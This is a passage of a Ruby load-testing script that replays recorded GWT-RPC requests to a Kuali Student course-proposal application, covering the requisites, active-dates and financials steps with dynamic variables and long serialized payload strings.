55|3479549402|1309965025280|682000000|8|58|14|38|-211|-257|8|48|14|67|8|96|17|5|6|7|0|0|-211|-275|8|21|17|5|6|7|0|1|8|84|17|5|6|7|0|1|8|22|14|97|-281|-283|-211|-279|-207|-209|-203|-205|8|30|14|98|8|39|17|5|6|7|0|5|8|52|14|65|8|54|46|55|3479549392|1309965025280|672000000|8|56|14|65|8|57|46|55|3479549392|1309965025280|672000000|8|58|14|38|-203|-291|8|48|14|67|8|99|17|5|6|7|0|0|-203|-309|8|50|14|100|-199|-201|-1|-197|8|101|17|5|6|7|0|2|18|-15|14|102|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|103|-323|-325|-317|-321|-1|-315|8|30|14|104|8|105|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|106|14|107|8|21|17|5|6|7|0|1|8|106|17|5|6|7|0|1|8|22|14|108|-345|-347|-339|-343|-335|-337|-1|-333|8|109|17|5|6|7|0|0|-1|-353|8|110|14|111|8|39|17|5|6|7|0|5|8|52|14|65|8|54|46|55|3479545033|1309965025280|313000000|8|56|14|65|8|57|46|55|3479549354|1309965025280|634000000|8|58|14|112|-1|-359|8|113|10|-5|8|114|17|5|6|7|0|0|-1|-377|8|115|10|-5|8|48|14|67|8|116|14|117|8|99|17|5|6|7|0|2|18|-15|14|118|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|119|-395|-397|-389|-393|-1|-387|8|120|14|121|8|50|14|122|8|96|17|5|6|7|0|2|18|-15|14|123|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|124|-415|-417|-409|-413|-1|-407|8|125|17|5|6|7|0|2|18|-15|14|126|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|127|-431|-433|-425|-429|-1|-423|8|128|17|5|6|7|0|0|-1|-439|8|129|17|5|6|7|0|3|8|130|46|55|3479545033|1309965025280|313000000|8|131|132|133|1|0|8|134|14|135|-1|-443|8|21|17|5|6|7|0|2|8|116|17|5|6|7|0|1|8|22|14|117|-457|-459|8|13|17|5|6|7|0|1|8|22|14|136|-457|-465|-1|-455|8|137|17|5|6|7|0|12|8|138|14|139|8|30|14|140|8|39|17|5|6|7|0|5|8|52|14|65|8|54|46|55|3479545302|1309965025280|582000000|8|56|14|65|8|57|46|55|3479550248|1309965025280|528000000|8|58|14|141|-473|-479|8|35|14|60|8|142|17|5|6|7|0|1|18|-15|14|104|-473|-497|8|143|14|144|8|145
|17|5|6|7|0|0|-473|-505|8|146|17|5|6|7|0|0|-473|-509|8|147|14|148|8|48|14|149|8|50|14|150|8|151|14|152|-1|-471|8|153|17|5|6|7|0|1|8|154|17|5|6|7|0|0|-523|-525|-1|-521|0|0|\"\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}\"\n },\n {\n 'subst' => 'true',\n :dyn_variables => [\n {\"name\" => opts[:lo_category_var_name], \"regexp\" => opts[:lo_category_var_regexp]}\n ]\n }\n )\n\n #@request.add(\"DEBUG/lo_category_var_name/%%_#{opts[:lo_category_var_name]}%%\", {}, {'subst' => 'true'})\n\n @request.add_thinktime(2)\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/LoCategoryRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|4|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|EDE1DECBD54F5894284944CD8AC3661C|org.kuali.student.lum.common.client.lo.rpc.LoCategoryRpcService|getLoCategoryTypes|1|2|3|4|0|\"\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/statementRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|2543249A07E7952228E0E500F14F1B17|org.kuali.student.lum.program.client.rpc.StatementRpcService|getStatementTypesForStatementTypeForCourse|java.lang.String/2004016611|kuali.statement.type.course|1|2|3|4|1|5|6|\"\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CourseRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|8|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|1ED48DA6F48F82765FE7B58378EA94E0|org.kuali.student.lum.lu.ui.course.client.service.CourseRpcService|getCourseStatements|java.lang.String/2004016611|%%_#{opts[:clu_ref_dyn_var_name]}%%|KUALI.RULE|en|1|2|3|4|3|5|5|5|6|7|8|\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n \n \n #\n # Course Requisites\n # Save without editing anything\n\n @request.add_thinktime(5)\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CourseRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|10|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|1ED48DA6F48F82765FE7B58378EA94E0|org.kuali.student.lum.lu.ui.course.client.service.CourseRpcService|storeCourseStatements|java.lang.String/2004016611|java.util.Map|%%_#{opts[:clu_ref_dyn_var_name]}%%|draft|java.util.HashMap/962170901|java.util.LinkedHashMap/1551059846|1|2|3|4|4|5|5|6|6|7|8|9|0|10|0|0|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/statementRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|2543249A07E7952228E0E500F14F1B17|org.kuali.student.lum.program.client.rpc.StatementRpcService|getStatementTypesForStatementTypeForCourse|java.lang.String/2004016611|kuali.statement.type.course|1|2|3|4|1|5|6|\"\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CourseRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => 
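\n              # The Course Requisites page is saved without edits, so the replay here is\n              # just the fetch/store round trip for the (empty) statement map.\n              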
\"5|0|8|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|1ED48DA6F48F82765FE7B58378EA94E0|org.kuali.student.lum.lu.ui.course.client.service.CourseRpcService|getCourseStatements|java.lang.String/2004016611|%%_#{opts[:clu_ref_dyn_var_name]}%%|KUALI.RULE|en|1|2|3|4|3|5|5|5|6|7|8|\"\n },\n {\n 'subst' => 'true'\n }\n )\n \n \n \n #\n # Active Dates\n # Start = Fall Sem 2008\n #\n\n @request.add_thinktime(10)\n\n # Save & Continue\n contents1 = \"5|0|160|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|passFail|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|audit|finalExamStatus|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|STD|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|loCategoryInfoList|id|%%_#{opts[:lo_category_id_var_name]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|createId|admin|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|0|name|#{opts[:lo_category]}|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|desc|formatted|#{opts[:lo_cat_text]}|plain|%%_#{opts[:lo_category_var_name]}%%|loRepositoryKey|#{opts[:propose_person]}|SINGLE USE LO|draft|kuali.lo.type.singleUse|courseTitle|#{opts[:course_title]}|creditOptions|fixedCreditValue|10.0|kuali.creditType.credit.degree.10.0|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, Fixed|crossListings|descr|#{opts[:course_description]}|duration|atpDurationTypeKey|kuali.atp.duration.Semester|timeQuantity|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|Semester|expenditure|affiliatedOrgs|fees|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_duration_week_var_name]}%%|1|unitsContentOwner|Lab|%%_#{opts[:lab_var_name]}%%|termsOffered|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|3|pilotCourse|revenues|specialTopicsCourse|subjectArea|#{opts[:subject_area]}|kuali.atp.season.Any|Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|%%_#{opts[:admin_dep_var_name]}%%|#{admin_org}|variations|versionInfo|currentVersionStart|sequenceNumber|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|versionIndId|%%_#{opts[:version_ind_id_name]}%%|Standard final 
Exam|dirty|startTerm|endTerm|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators|kuali.atp.FA2008-2009\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|38|8|9|10|11|0|8|12|10|-5|8|13|14|15|8|16|17|5|6|7|0|2|18|19|0|14|20|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|23|-19|-21|-12|-17|-1|-10|8|24|14|25|8|26|14|27|8|28|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|8|29|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|30|14|31|8|32|14|33|8|34|17|5|6|7|0|5|8|35|14|36|8|37|38|39|3759152200|1288490188800|0|8|40|14|36|8|41|38|39|3759152200|1288490188800|0|8|42|14|43|-45|-51|8|44|14|45|8|46|14|47|8|48|14|49|-41|-43|-37|-39|8|50|17|5|6|7|0|0|-37|-73|8|51|17|5|6|7|0|8|8|52|14|43|8|53|17|5|6|7|0|2|8|54|14|55|8|56|14|55|-79|-83|8|30|14|57|8|58|14|33|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3487349987|1309965025280|267000000|8|40|14|59|8|41|38|39|3487349987|1309965025280|267000000|8|42|14|43|-79|-95|8|44|14|60|8|46|14|61|8|48|14|62|-37|-77|-33|-35|-1|-31|8|63|14|64|8|65|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|66|14|67|8|30|14|68|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3479039543|1309965025280|823000000|8|40|14|59|8|41|38|39|3479039543|1309965025280|823000000|8|42|14|43|-125|-131|8|69|17|5|6|7|0|1|18|-15|14|67|-125|-147|8|46|14|61|8|48|14|70|8|21|17|5|6|7|0|1|8|48|17|5|6|7|0|1|8|22|14|71|-159|-161|-125|-157|-121|-123|-1|-119|8|72|17|5|6|7|0|0|-1|-167|8|73|17|5|6|7|0|1|8|56|14|74|-1|-171|8|75|17|5|6|7|0|3|8|76|14|77|8|78|79|19|2|8|21|17|5|6|7|0|1|8|76|17|5|6|7|0|1|8|22|14|80|-188|-190|-179|-186|-1|-177|8|81|17|5|6|7|0|1|8|82|17|5|6|7|0|0|-198|-200|-1|-196|8|83|17|5|6|7|0|0|-1|-204|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|85|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|86|14|87|8|88|17|5|6|7|0|3|8|89|14|90|8|91|14|92|8|21|17|5|6|7|0|1|8|91|17|5|6|7|0|1|8|22|14|93|-236|-238|-228|-234|-222|-226|8|94|79|19|100|8|75|17|5|6|7|0|3|8|76|14|95|8|78|79|19|13|8|21|17|5|6|7|0|1|8|76|17|5|6|7|0|1|8|22|14|96|-258|-260|-249|-256|-222|-247|8|30|14|97|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3487345884|1309965025280|164000000|8|40|14|59|8|41|38|39|3487349962|1309965025280|242000000|8|42|14|98|-222|-268|8|46|14|61|8|99|17|5|6|7|0|0|-222|-286|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|100|-292|-294|-222|-290|-218|-220|-214|-216|8|30|14|101|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3487345875|1309965025280|155000000|8|40|14|59|8|41|38|39|3487349936|1309965025280|216000000|8|42|14|98|-214|-302|8|46|14|61|8|102|17|5|6|7|0|0|-214|-320|8|48|14|103|-210|-212|-1|-208|8|104|17|5|6|7|0|2|18|-15|14|105|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|106|-334|-336|-328|-332|-1|-326|8|30|14|107|8|108|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|109|14|110|8|21|17|5|6|7|0|1|8|109|17|5|6|7|0|1|8|22|14|111|-356|-358|-350|-354|-346|-348|-1|-344|8|112|17|5|6|7|0|0|-1|-364|8|113|14|114|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3487341491|1309965025280|771000000|8|40|14|59|8|41|38|39|3487349901|1309965025280|181000000|8|42|14|115|-1|-370|8|116|10|-5|8|117|17|5|6|7|0|0|-1|-388|8|118|10|-5|8|46|14|61|8|119|14|120|8|102|17|5|6|7|0|2|18|-15|14|121|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|122|-406|-408|-400|-404|-1|-398|8|123|14|124|8|48|14|125|8|99|17|5|6|7|0|2|18|-15|14|126|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|127|-426|-428|-420|-424|-1|-418|8|128|17|5|6|7|0|2|18|-15|14|129|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|130|-442|-
444|-436|-440|-1|-434|8|131|17|5|6|7|0|0|-1|-450|8|132|17|5|6|7|0|3|8|133|38|39|3487341491|1309965025280|771000000|8|134|135|136|1|0|8|137|14|138|-1|-454|8|21|17|5|6|7|0|3|8|119|17|5|6|7|0|1|8|22|14|120|-468|-470|8|13|17|5|6|7|0|1|8|22|14|139|-468|-476|8|140|17|5|6|7|0|2|8|141|10|11|1|8|142|10|-488|-468|-482|-1|-466|8|143|17|5|6|7|0|12|8|144|14|145|8|30|14|146|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3487341710|1309965025280|990000000|8|40|14|59|8|41|38|39|3487350824|1309965025280|104000000|8|42|14|90|-493|-499|8|44|14|64|8|147|17|5|6|7|0|1|18|-15|14|107|-493|-517|8|148|14|149|8|150|17|5|6|7|0|0|-493|-525|8|151|17|5|6|7|0|0|-493|-529|8|152|14|153|8|46|14|154|8|48|14|155|8|156|14|157|-1|-491|8|158|17|5|6|7|0|1|8|159|17|5|6|7|0|0|-543|-545|-1|-541|-486|14|160|-489|14|0|0|0|\"\n    @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n      {\n        'method' => 'POST',\n        'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n        'contents' => \"#{contents1}#{contents2}\"\n      },\n      {\n        'subst' => 'true'\n      }\n    )\n    \n    \n    \n    #\n    # Financials\n    # $100 lab fee\n    # Admin org 100% rev and exp\n    #\n\n    @request.add_thinktime(5)\n\n    @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n      {\n        'method' => 'POST',\n        'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n        'contents' => \"5|0|11|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|cachingSearch|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|enumeration.queryParam.enumerationType|kuali.lu.fee.feeType|enumeration.management.search|enumeration.resultColumn.sortKey|1|2|3|4|1|5|5|0|0|6|1|7|8|0|9|10|11|0|0|\"\n      }\n    )\n\n    # Revenue - Admin Org\n    for i in 1..admin_org.length\n      itr = i-1\n      @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n        {\n          'method' => 'POST',\n          'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n          'contents' => \"5|0|16|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|org.queryParam.orgOptionalLongName|#{admin_org[0..itr]}|org.queryParam.orgOptionalType|java.lang.String/2004016611|kuali.org.Department|kuali.org.College|org.search.generic||1|2|3|4|1|5|5|0|6|0|7|2|8|9|0|10|8|11|7|2|12|13|12|14|0|15|16|0|0|\"\n        } \n      ) \n    end\n\n    @request.add_thinktime(5)\n\n    # Expense - Admin Org\n    for i in 1..admin_org.length\n      itr = i-1\n      if(i == admin_org.length)\n        @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n          {\n            'method' => 'POST',\n            'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n            'contents' => 
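\n            # Only this last keystroke of the incremental org search re-captures\n            # admin_dep_var_name via :dyn_variables; the else branch below replays the\n            # intermediate autocomplete requests without capturing anything.\n            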
\"5|0|16|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|org.queryParam.orgOptionalLongName|#{admin_org[0..itr]}|org.queryParam.orgOptionalType|java.lang.String/2004016611|kuali.org.Department|kuali.org.College|org.search.generic||1|2|3|4|1|5|5|0|6|0|7|2|8|9|0|10|8|11|7|2|12|13|12|14|0|15|16|0|0|\"\n },\n {\n :dyn_variables => [\n {\"name\" => opts[:admin_dep_var_name], \"regexp\" => opts[:admin_dep_var_regexp]}\n ]\n } \n )\n else\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/SearchRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|16|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|DB85114A8D2B33860498043707FB831D|org.kuali.student.common.ui.client.service.SearchRpcService|search|org.kuali.student.common.search.dto.SearchRequest/2597477947|java.lang.Boolean/476441737|java.util.ArrayList/3821976829|org.kuali.student.common.search.dto.SearchParam/1222427352|org.queryParam.orgOptionalLongName|#{admin_org[0..itr]}|org.queryParam.orgOptionalType|java.lang.String/2004016611|kuali.org.Department|kuali.org.College|org.search.generic||1|2|3|4|1|5|5|0|6|0|7|2|8|9|0|10|8|11|7|2|12|13|12|14|0|15|16|0|0|\"\n } \n )\n end \n end\n\n #@request.add(\"DEBUG/admin_dep_var_name/%%_#{opts[:admin_dep_var_name]}%%\", {}, {'subst' => 'true'})\n\n @request.add_thinktime(20)\n\n # Save & Continue\n contents1 = \"5|0|172|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|D60D3C6E0D395C18A0F44A2D9D2A7348|org.kuali.student.lum.lu.ui.course.client.service.CreditCourseProposalRpcService|saveData|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|passFail|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|audit|finalExamStatus|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|STD|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|loCategoryInfoList|id|%%_#{opts[:lo_category_id_var_name]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|createId|admin|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|0|name|#{opts[:lo_category]}|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|desc|formatted|#{opts[:lo_cat_text]}|plain|%%_#{opts[:lo_category_var_name]}%%|loRepositoryKey|#{opts[:propose_person]}|1|SINGLE USE LO|draft|kuali.lo.type.singleUse|courseTitle|#{opts[:course_title]}|creditOptions|fixedCreditValue|10.0|kuali.creditType.credit.degree.10.0|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, 
Fixed|crossListings|descr|#{opts[:course_description]}|duration|atpDurationTypeKey|kuali.atp.duration.Semester|timeQuantity|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|Semester|effectiveDate|expenditure|affiliatedOrgs|dirty|orgId|percentage|created|%%_#{opts[:admin_dep_var_name]}%%|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|fees|feeType|rateType|kuali.enum.type.feeTypes.labFee|fixedRateFee|feeAmounts|currencyQuantity|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_duration_week_var_name]}%%|2|unitsContentOwner|Lab|%%_#{opts[:lab_var_name]}%%|termsOffered|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|4|pilotCourse|revenues|specialTopicsCourse|startTerm|kuali.atp.FA2008-2009|subjectArea|#{opts[:subject_area]}|kuali.atp.season.Any|Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|#{admin_org}|variations|versionInfo|currentVersionStart|sequenceNumber|versionIndId|%%_#{opts[:version_ind_id_name]}%%|Fall Semester of 2008|Standard final Exam|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|6|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators\"\n contents2 = 
\"|1|2|3|4|1|5|5|6|7|0|38|8|9|10|11|0|8|12|10|-5|8|13|14|15|8|16|17|5|6|7|0|2|18|19|0|14|20|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|23|-19|-21|-12|-17|-1|-10|8|24|14|25|8|26|14|27|8|28|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|8|29|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|30|14|31|8|32|14|33|8|34|17|5|6|7|0|5|8|35|14|36|8|37|38|39|3759152200|1288490188800|0|8|40|14|36|8|41|38|39|3759152200|1288490188800|0|8|42|14|43|-45|-51|8|44|14|45|8|46|14|47|8|48|14|49|-41|-43|-37|-39|8|50|17|5|6|7|0|0|-37|-73|8|51|17|5|6|7|0|8|8|52|14|43|8|53|17|5|6|7|0|2|8|54|14|55|8|56|14|55|-79|-83|8|30|14|57|8|58|14|33|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3488193507|1309965025280|787000000|8|40|14|59|8|41|38|39|3488196257|1309965025280|537000000|8|42|14|60|-79|-95|8|44|14|61|8|46|14|62|8|48|14|63|-37|-77|-33|-35|-1|-31|8|64|14|65|8|66|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|67|14|68|8|30|14|69|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3479039543|1309965025280|823000000|8|40|14|59|8|41|38|39|3479039543|1309965025280|823000000|8|42|14|43|-125|-131|8|70|17|5|6|7|0|1|18|-15|14|68|-125|-147|8|46|14|62|8|48|14|71|8|21|17|5|6|7|0|1|8|48|17|5|6|7|0|1|8|22|14|72|-159|-161|-125|-157|-121|-123|-1|-119|8|73|17|5|6|7|0|0|-1|-167|8|74|17|5|6|7|0|1|8|56|14|75|-1|-171|8|76|17|5|6|7|0|3|8|77|14|78|8|79|80|19|2|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|81|-188|-190|-179|-186|-1|-177|8|82|38|39|470887936|1219770712064|0|8|83|17|5|6|7|0|1|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|8|21|17|5|6|7|0|3|8|85|17|5|6|7|0|2|8|86|10|11|1|8|87|10|-221|-213|-215|8|88|10|-221|-211|17|5|6|7|0|1|-215|17|5|6|7|0|1|-224|10|-221|-227|-215|-213|-211|-209|-211|-219|14|89|-222|90|91|100|0|-205|-207|-201|-203|-1|-199|8|92|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|-211|17|5|6|7|0|3|-215|17|5|6|7|0|2|8|93|10|-221|8|94|10|-221|-245|-215|8|88|10|-221|-211|17|5|6|7|0|1|-215|17|5|6|7|0|1|-254|10|-221|-257|-215|-245|-211|-242|-211|-250|14|95|-252|14|96|8|97|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|98|80|19|100|-211|17|5|6|7|0|1|-215|17|5|6|7|0|1|-273|10|-221|-277|-215|-271|-211|-267|-269|-242|-265|-238|-240|-1|-236|8|99|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|100|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|101|14|102|8|103|17|5|6|7|0|3|8|104|14|105|8|106|14|107|8|21|17|5|6|7|0|1|8|106|17|5|6|7|0|1|8|22|14|108|-311|-313|-303|-309|-297|-301|8|109|80|-275|8|76|17|5|6|7|0|3|8|77|14|110|8|79|80|19|13|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0\"\n contents3 = 
\"|1|8|22|14|111|-332|-334|-323|-330|-297|-321|8|30|14|112|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3488189822|1309965025280|102000000|8|40|14|59|8|41|38|39|3488196198|1309965025280|478000000|8|42|14|113|-297|-342|8|46|14|62|8|114|17|5|6|7|0|0|-297|-360|8|21|17|5|6|7|0|1|8|101|17|5|6|7|0|1|8|22|14|115|-366|-368|-297|-364|-293|-295|-289|-291|8|30|14|116|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3488189788|1309965025280|68000000|8|40|14|59|8|41|38|39|3488196188|1309965025280|468000000|8|42|14|113|-289|-376|8|46|14|62|8|117|17|5|6|7|0|0|-289|-394|8|48|14|118|-285|-287|-1|-283|8|119|17|5|6|7|0|2|18|-15|14|120|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|121|-408|-410|-402|-406|-1|-400|8|30|14|122|8|123|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|124|14|125|8|21|17|5|6|7|0|1|8|124|17|5|6|7|0|1|8|22|14|126|-430|-432|-424|-428|-420|-422|-1|-418|8|127|17|5|6|7|0|0|-1|-438|8|128|14|129|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3488185173|1309965025280|453000000|8|40|14|59|8|41|38|39|3488196156|1309965025280|436000000|8|42|14|130|-1|-444|8|131|10|-5|8|132|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|-211|17|5|6|7|0|1|-215|17|5|6|7|0|2|8|86|10|-221|8|87|10|-221|-479|-215|-476|-211|-484|14|89|-486|90|-235|-472|-474|-468|-470|8|21|17|5|6|7|0|2|8|88|10|-221|-211|17|5|6|7|0|1|-215|17|5|6|7|0|1|-494|10|-221|-497|-215|-492|-211|-468|-490|-464|-466|-1|-462|8|133|10|-5|8|134|14|135|8|46|14|62|8|136|14|137|8|117|17|5|6|7|0|2|18|-15|14|138|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|139|-519|-521|-513|-517|-1|-511|8|140|14|141|8|48|14|142|8|114|17|5|6|7|0|2|18|-15|14|143|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|144|-539|-541|-533|-537|-1|-531|8|145|1